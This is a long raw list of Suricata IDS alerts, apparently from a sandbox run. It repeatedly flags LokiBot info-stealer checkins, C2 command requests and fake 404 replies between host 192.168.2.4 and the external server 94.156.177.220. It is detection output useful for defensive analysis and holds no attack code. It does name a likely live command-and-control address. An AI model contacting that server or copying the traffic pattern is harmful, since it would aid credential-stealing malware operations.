                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49917 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49954 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49736
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49877 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49883
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49770 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49770 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49770 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49963 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49917 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49917 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49767
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49917 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49917
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49969 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49753
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49900 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49954 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49877 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49947 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49969 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49947 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49969 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49732
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49969 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49954 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49954
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49900 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49985 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49985 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49963 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49985 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49770 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49770 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49969 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49805
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49998 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50005 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50005 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50005 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49775
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49877
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49985 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49998 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49900 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49998 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49963 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49947
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50005 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49969
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49756
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49985 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50005 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49741
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49900 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49963 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49963 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49975 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49910 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49975 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49985
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49998 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49998 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49934 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49770
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49900 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49940 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49934 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49934 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49910 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49940 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49900
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50005
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49934 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49934 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50056 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49998
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49975 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49963
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49910 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49940 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50033 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50033 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50033 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49754
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50056 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50056 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49769
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49799 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49799 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49762
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49975 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49799 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49975 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49793 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49934
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49793 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49940 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50056 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50078 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50078 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50078 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49799 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49793 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49793 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49793 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50089 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50089 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50021 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49940 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49793
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50102 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49940
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50102 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49799 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50033 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50021 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49799
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50056 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49910 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50102 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49910 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50097 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50085 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50056
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50089 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49766 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50085 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50021 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50089 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50021 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50097 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50078 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50078 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49975
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50033 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50089 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50102 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50021 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50050 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50097 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:49766
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50085 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50033
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50096 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50102 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50096 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50096 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49991 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49858 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50085 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.4:50102
                      Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50085 -> 94.156.177.220:80
                      Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50096 -> 94.156.177.220:80
